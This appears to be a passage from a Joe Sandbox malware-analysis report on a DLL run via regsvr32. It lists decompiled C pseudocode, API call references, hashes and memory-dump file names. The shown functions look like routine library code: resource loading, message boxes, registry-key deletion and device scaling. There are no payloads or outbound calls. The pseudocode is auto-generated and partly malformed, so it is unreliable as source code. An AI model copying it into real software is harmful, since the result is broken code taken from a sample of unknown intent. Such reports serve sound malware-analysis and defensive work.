0x100078cc
0x100078ce
0x10007904
0x10007904
0x10007907
0x1000790a
0x1000790e
0x10007911
0x1000791a
0x1000791c
0x1000791f
0x10007946
0x10007946
0x10007921
0x1000792a
0x10007932
0x10007938
0x1000793c
0x1000793f
0x10007942
0x10007942
0x1000794b
0x1000794e
0x10007952
0x10007953
0x1000795f
0x10007955
0x10007955
0x10007958
0x10007958
0x10007953
0x00000000
0x10007911
0x100078d0
0x100078d3
0x100078d9
0x100078dc
0x00000000
0x100078de
0x100078de
0x100078e1
0x100078e3
0x100078e6
0x100078fe
0x100078e8
0x100078f9
0x100078f9
0x100078e6
0x10007964
0x10007967
0x10007968
0x1000796b
0x1000796b
0x100078c9
0x00000000
0x100078c3

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 10007834
LoadResource.KERNEL32(?,00000000), ref: 10007840
LockResource.KERNEL32(00000000), ref: 10007855
FreeResource.KERNEL32(00000000), ref: 10007888
GetDlgItem.USER32 ref: 10007932

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeItemLoadLock
String ID:
API String ID: 996205394-0
Opcode ID: 5f164a4374ed0bc4e462ab176c3203574c5e3f7cf5b8794c4b3e3ad33105d570
Instruction ID: c7b5fc4d005d0bad37349b5c4922ae84c6c4ed43775b19cc7b128b96645b94f8
Opcode Fuzzy Hash: 5f164a4374ed0bc4e462ab176c3203574c5e3f7cf5b8794c4b3e3ad33105d570
Instruction Fuzzy Hash: 67515C75D00249EFEB14DFA4C884AADBBB5FF04390F20C4A9E9199B265D734EA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10009F31 Relevance: 7.6, APIs: 5, Instructions: 126
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10009F31(void* __ecx) {
				void* _t62;
				void* _t63;
				void* _t75;

				E10011A8C(E1002AB54, _t75);
				_t62 =  *((intOrPtr*)(_t75 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x1000a11d) & 0x000000ff) * 4 +  &M1000A0F5))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t75 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E1000A747( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E1002320B();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E100071A9(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E10027868(__ebp + 0xc, __esi);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E10024F03(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E10024F5E(__ebp - 0x20);
							}
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E10009499( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E10009811(__esi, __eax);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E1002320B();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E10027868(__ebp + 0xc, __esi);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E10002EB0(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return _t63;
			}

0x10009f36
0x10009f43
0x10009f4e
0x1000a0e3
0x1000a0e3
0x10009f54
0x10009f5b
0x00000000
0x10009f86
0x10009f89
0x10009f8e
0x00000000
0x00000000
0x10009f62
0x10009f65
0x10009f6a
0x00000000
0x00000000
0x1000a03c
0x1000a03f
0x1000a042
0x1000a04c
0x1000a04e
0x1000a050
0x00000000
0x00000000
0x10009f74
0x10009f77
0x10009f7c
0x00000000
0x00000000
0x1000a09a
0x1000a09f
0x1000a0a1
0x1000a0a3
0x1000a0a9
0x1000a0b1
0x1000a0b4
0x1000a0bb
0x1000a0c0
0x1000a0c3
0x1000a0c6
0x1000a0cb
0x1000a0d0
0x1000a0d3
0x1000a0d6
0x00000000
0x00000000
0x1000a059
0x1000a05c
0x1000a067
0x00000000
0x00000000
0x10009f9d
0x10009f9f
0x10009fa2
0x10009faa
0x10009fba
0x10009fcc
0x10009fcf
0x10009fd5
0x10009fd8
0x10009fdb
0x10009fdb
0x10009fe6
0x10009fe9
0x10009fee
0x10009ff5
0x10009ff0
0x10009ff0
0x10009ff0
0x10009ff8
0x00000000
0x00000000
0x1000a004
0x1000a020
0x1000a020
0x1000a023
0x1000a028
0x1000a02b
0x1000a02d
0x1000a031
0x1000a034
0x00000000
0x1000a006
0x1000a006
0x1000a009
0x1000a00f
0x1000a011
0x1000a01a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a01a
0x00000000
0x00000000
0x1000a06c
0x1000a071
0x1000a073
0x1000a078
0x1000a078
0x1000a07b
0x1000a07e
0x1000a081
0x1000a085
0x1000a088
0x1000a092
0x1000a095
0x1000a095
0x1000a0d9
0x1000a0d9
0x1000a0de
0x1000a0e0
0x00000000
0x00000000
0x00000000
0x00000000
0x10009f5b
0x1000a0e5
0x1000a0ea
0x1000a0f2

APIs

__EH_prolog.LIBCMT ref: 10009F36
SendMessageA.USER32 ref: 10009FBA
GetBkColor.GDI32(?), ref: 10009FC3
GetTextColor.GDI32(?), ref: 10009FCF
GetThreadLocale.KERNEL32(0000F1C0), ref: 1000A061

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: 5b46a2f0a4d9aeb6bd3d3888704014459c5a64464480e5c1a809dedaa06e353e
Instruction ID: 905547f011d5b54e7a51ea35d25ef1f1897d24009aaa0b6ac730ed335b3b68b1
Opcode Fuzzy Hash: 5b46a2f0a4d9aeb6bd3d3888704014459c5a64464480e5c1a809dedaa06e353e
Instruction Fuzzy Hash: 87518B3590070ADFDB20CF64C88499EB7B0FF05350F218A59E85A9B3A5EBB4F885DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10025C20 Relevance: 7.6, APIs: 5, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10025C20(intOrPtr __ecx) {
				intOrPtr _t30;
				long _t35;
				signed int _t43;
				intOrPtr _t45;
				long _t47;
				struct HWND__* _t50;
				CHAR* _t51;
				int _t52;
				long _t58;
				intOrPtr _t61;
				void* _t64;
				void* _t66;

				_t64 = _t66 - 0x98;
				_t30 =  *0x100371f4; // 0x39cf7dc9
				_t61 = __ecx;
				_t58 = 0;
				_push(0);
				 *((intOrPtr*)(_t64 + 0x94)) = _t30;
				 *((intOrPtr*)(_t64 - 0x7c)) = __ecx;
				E10025B55();
				_t50 = E10025B82(0, _t64 - 0x74);
				 *(_t64 - 0x80) = _t50;
				if(_t50 !=  *(_t64 - 0x74)) {
					EnableWindow(_t50, 1);
				}
				if(_t50 == 0) {
					L5:
					if(_t61 != 0) {
						_t58 = _t61 + 0x74;
					}
					L7:
					 *(_t64 - 0x78) =  *(_t64 - 0x78) & 0x00000000;
					if(_t58 != 0) {
						 *(_t64 - 0x78) =  *_t58;
						_t45 =  *((intOrPtr*)(_t64 + 0xa8));
						if(_t45 != 0) {
							 *_t58 = _t45 + 0x30000;
						}
					}
					if(( *(_t64 + 0xa4) & 0x000000f0) == 0) {
						_t43 =  *(_t64 + 0xa4) & 0x0000000f;
						if(_t43 <= 1 || _t43 > 2 && _t43 <= 4) {
							 *(_t64 + 0xa4) =  *(_t64 + 0xa4) | 0x00000030;
						}
					}
					 *(_t64 - 0x70) = 0;
					if(_t61 == 0) {
						_t51 = _t64 - 0x70;
						_t35 = GetModuleFileNameA(0, _t51, 0x104);
						_t61 =  *((intOrPtr*)(_t64 - 0x7c));
						if(_t35 == 0x104) {
							 *((char*)(_t64 + 0x93)) = 0;
						}
					} else {
						_t51 =  *(_t61 + 0x4c);
					}
					_t52 = MessageBoxA( *(_t64 - 0x80),  *(_t64 + 0xa0), _t51,  *(_t64 + 0xa4));
					if(_t58 != 0) {
						 *_t58 =  *(_t64 - 0x78);
					}
					if( *(_t64 - 0x74) != 0) {
						EnableWindow( *(_t64 - 0x74), 1);
					}
					_push(1);
					E10025B55();
					return E10011A49(_t52,  *((intOrPtr*)(_t64 + 0x94)));
				}
				_t47 = SendMessageA(_t50, 0x376, 0, 0);
				if(_t47 == 0) {
					goto L5;
				} else {
					_t58 = _t47;
					goto L7;
				}
			}

0x10025c21
0x10025c2e
0x10025c36
0x10025c38
0x10025c3a
0x10025c3b
0x10025c41
0x10025c44
0x10025c53
0x10025c58
0x10025c5b
0x10025c60
0x10025c60
0x10025c68
0x10025c82
0x10025c84
0x10025c86
0x10025c86
0x10025c89
0x10025c89
0x10025c8f
0x10025c93
0x10025c96
0x10025c9e
0x10025ca5
0x10025ca5
0x10025c9e
0x10025cae
0x10025cb6
0x10025cbc
0x10025cc8
0x10025cc8
0x10025cbc
0x10025cd1
0x10025cd5
0x10025cdc
0x10025cea
0x10025cf2
0x10025cf5
0x10025cf7
0x10025cf7
0x10025cd7
0x10025cd7
0x10025cd7
0x10025d16
0x10025d18
0x10025d1d
0x10025d1d
0x10025d23
0x10025d2a
0x10025d2a
0x10025d30
0x10025d34
0x10025d50
0x10025d50
0x10025c74
0x10025c7c
0x00000000
0x10025c7e
0x10025c7e
0x00000000
0x10025c7e

APIs

Part of subcall function 10025B82: GetParent.USER32(?), ref: 10025BD5
Part of subcall function 10025B82: GetLastActivePopup.USER32(?), ref: 10025BE4
Part of subcall function 10025B82: IsWindowEnabled.USER32(?), ref: 10025BF9
Part of subcall function 10025B82: EnableWindow.USER32(?,00000000), ref: 10025C0C

EnableWindow.USER32(?,00000001), ref: 10025C60
SendMessageA.USER32 ref: 10025C74
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 10025CEA
MessageBoxA.USER32 ref: 10025D0E
EnableWindow.USER32(?,00000001), ref: 10025D2A

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 489645344-0
Opcode ID: 7eeb4a5366b1176224571fdbe8bbc300a38818d4963199f985bc7225734bc818
Instruction ID: 6c202a0c4669d05dddf5519bf7c771b1bfe76587600dfaecdd07e7803bbc8ff2
Opcode Fuzzy Hash: 7eeb4a5366b1176224571fdbe8bbc300a38818d4963199f985bc7225734bc818
Instruction Fuzzy Hash: 6831B431A003599FEB31DF64DC85B9D7BF8EF45746F700129EA0AAB281E7B29D008B14

Uniqueness

Uniqueness Score: -1.00%

Function 10026FE0 Relevance: 7.6, APIs: 5, Instructions: 70
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10026FE0(void* __edx) {
				intOrPtr _t28;
				signed int _t31;
				signed int _t35;
				signed int _t44;
				void* _t52;
				void* _t58;
				void* _t60;

				_t52 = __edx;
				E10011A8C(E1002A776, _t58);
				_t28 =  *0x100371f4; // 0x39cf7dc9
				_push(_t44);
				 *((intOrPtr*)(_t58 - 0x14)) = _t28;
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x11c;
				_t31 = RegOpenKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)), _t58 - 0x124);
				_t56 = _t31;
				if(_t31 == 0) {
					while(1) {
						_t35 = RegEnumKeyA( *(_t58 - 0x124), 0, _t58 - 0x11c, 0x104);
						_t56 = _t35;
						_t64 = _t56;
						if(_t56 != 0) {
							break;
						}
						 *(_t58 - 4) =  *(_t58 - 4) & _t35;
						_push(_t58 - 0x11c);
						E100072DF(_t58 - 0x120, _t64);
						 *(_t58 - 4) = 1;
						_t56 = E10026FE0(_t52,  *(_t58 - 0x124), _t58 - 0x120);
						_t44 = _t44 & 0xffffff00 | _t56 != 0x00000000;
						 *(_t58 - 4) = 0;
						E10002EB0( *((intOrPtr*)(_t58 - 0x120)) + 0xfffffff0, _t52);
						if(_t44 == 0) {
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t56 - 0x103;
					if(_t56 == 0x103) {
						L6:
						_t56 = RegDeleteKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)));
					} else {
						__eflags = _t56 - 0x3f2;
						if(_t56 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t58 - 0x124));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return E10011A49(_t56,  *((intOrPtr*)(_t58 - 0x14)));
			}

0x10026fe0
0x10026fe5
0x10026ff0
0x10026ff5
0x10026ff8
0x10027000
0x1002700e
0x10027014
0x10027018
0x1002701e
0x10027032
0x10027038
0x1002703a
0x1002703c
0x00000000
0x00000000
0x1002703e
0x10027047
0x1002704e
0x10027060
0x1002706f
0x10027073
0x10027079
0x1002707d
0x10027084
0x10027086
0x00000000
0x10027086
0x00000000
0x10027084
0x100270ad
0x100270b3
0x100270bd
0x100270cb
0x100270b5
0x100270b5
0x100270bb
0x00000000
0x00000000
0x100270bb
0x100270d3
0x100270d3
0x100270dc
0x100270f1

APIs

__EH_prolog.LIBCMT ref: 10026FE5
RegOpenKeyA.ADVAPI32(?,?,?), ref: 1002700E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 10027032
RegDeleteKeyA.ADVAPI32(?,?), ref: 100270C5
RegCloseKey.ADVAPI32(?), ref: 100270D3

Part of subcall function 100072DF: __EH_prolog.LIBCMT ref: 100072E4

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog$CloseDeleteEnumOpen
String ID:
API String ID: 4272528234-0
Opcode ID: de41e07131146d6c51b0b06f95e967c4d17f8aae6e93a8b2909c4cf4472956af
Instruction ID: e4ea11f03fdf571fccec0f23b9cd64b61358b81ed8f88b6a32dc33c99e0bc630
Opcode Fuzzy Hash: de41e07131146d6c51b0b06f95e967c4d17f8aae6e93a8b2909c4cf4472956af
Instruction Fuzzy Hash: 9C216B36D00129DBDB22DB58DD81BDEBBB4FB08350F1042A5E959A72A0D7309E54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10026753 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10026753(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1003a0a8; // 0x60
					_t12 =  *0x1003a0ac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10024CF2(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x10026756
0x10026759
0x1002675e
0x100267aa
0x100267b0
0x00000000
0x10026760
0x10026769
0x1002676e
0x100267a4
0x100267a6
0x100267b5
0x100267b5
0x100267c7
0x100267cf
0x100267d5
0x100267d7
0x10026775
0x10026777
0x1002677b
0x10026783
0x1002678a
0x1002678d
0x1002678d
0x1002676e
0x100267de

APIs

GetMapMode.GDI32(?,?,?,?,?,?,1000A594,?,00000000,?,742C8B90), ref: 10026763
GetDeviceCaps.GDI32(?,00000058), ref: 1002679D
GetDeviceCaps.GDI32(?,0000005A), ref: 100267A6

Part of subcall function 10024CF2: MulDiv.KERNEL32(?,00000000,00000000), ref: 10024D32
Part of subcall function 10024CF2: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10024D4F

MulDiv.KERNEL32(?,000009EC,00000060), ref: 100267CA
MulDiv.KERNEL32(00000000,000009EC,742C8B90), ref: 100267D5

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 760de799c1e75d7bb557801077cbbfa8471c73a5d46f1b5f06ad39d09cfeeea3
Instruction ID: e9f0b5c96ca458b1cd62f243af22444899a9743c261e7e4df7add4579d722cac
Opcode Fuzzy Hash: 760de799c1e75d7bb557801077cbbfa8471c73a5d46f1b5f06ad39d09cfeeea3
Instruction Fuzzy Hash: D911E135600A14AFDB22AF69DC84C0EBBF9FF88754B224419FA819B361D771ED418F90

Uniqueness

Uniqueness Score: -1.00%

Function 100267E1 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100267E1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1003a0a8; // 0x60
					_t12 =  *0x1003a0ac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10024C89(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x100267e4
0x100267e7
0x100267ec
0x10026838
0x1002683e
0x00000000
0x100267ee
0x100267f7
0x100267fc
0x10026832
0x10026834
0x10026843
0x10026843
0x10026855
0x1002685e
0x10026860
0x10026863
0x10026865
0x10026803
0x10026805
0x10026809
0x10026811
0x10026818
0x1002681b
0x1002681b
0x100267fc
0x1002686c

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,1000A5C8,?), ref: 100267F1
GetDeviceCaps.GDI32(?,00000058), ref: 1002682B
GetDeviceCaps.GDI32(?,0000005A), ref: 10026834

Part of subcall function 10024C89: MulDiv.KERNEL32(1000A5C8,00000000,00000000), ref: 10024CC9
Part of subcall function 10024C89: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10024CE6

MulDiv.KERNEL32(1000A5C8,00000060,000009EC), ref: 10026858
MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10026863

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 11f4eb96b132fec85dcb3edfcd3011721d414923e9977079241e7a5a94dd0393
Instruction ID: 99770bef64d05f0654aa0606508a78cf0463e95a34ff476b879fb657cc8f91ae
Opcode Fuzzy Hash: 11f4eb96b132fec85dcb3edfcd3011721d414923e9977079241e7a5a94dd0393
Instruction Fuzzy Hash: 7C11E135A00A14AFDB229F55DC84C1EBBF9EF89750B210419FA8157360CB31ED41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 100142F3 Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E100142F3(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1003a1cc( *0x10037494);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E10013955(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E1001198E(0x10);
					} else {
						_push(_t17);
						_push( *0x10037494);
						if( *0x1003a1d0() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x10037a08;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}

0x100142f5
0x10014301
0x10014309
0x1001430b
0x1001430d
0x1001430f
0x10014314
0x1001431b
0x10014321
0x10014350
0x10014352
0x10014323
0x10014323
0x10014324
0x10014332
0x00000000
0x10014334
0x10014334
0x1001433b
0x10014342
0x10014348
0x1001434c
0x1001434c
0x10014332
0x10014321
0x10014359
0x10014363

APIs

GetLastError.KERNEL32(?,00000000,10013373,10014CA0,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010,100144CB), ref: 100142F5
FlsGetValue.KERNEL32(?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?,1002E838), ref: 10014303
SetLastError.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 10014359

Part of subcall function 10013955: __lock.LIBCMT ref: 10013999
Part of subcall function 10013955: RtlAllocateHeap.NTDLL(00000008,?,1002E908,00000010,1001431B,00000001,0000008C,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000), ref: 100139D7

FlsSetValue.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 1001432A
GetCurrentThreadId.KERNEL32 ref: 10014342

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
String ID:
API String ID: 1487844433-0
Opcode ID: 151fadb9f5133ce9d09635453be35eb11438846519243a8763ef05a751eb20a2
Instruction ID: 6a455f0676b140873558791424d391acb8e9dcb403d95b32c906c56bd03f138a
Opcode Fuzzy Hash: 151fadb9f5133ce9d09635453be35eb11438846519243a8763ef05a751eb20a2
Instruction Fuzzy Hash: EAF0C232601B219FF3225F609C4960A7BA4FB017A2F120618EAA69E1A2CF71D9808790

Uniqueness

Uniqueness Score: -1.00%

Function 1000E51C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000E51C(intOrPtr* __ecx) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011A8C(E1002AC5F, _t263);
				_t130 =  *0x100371f4; // 0x39cf7dc9
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
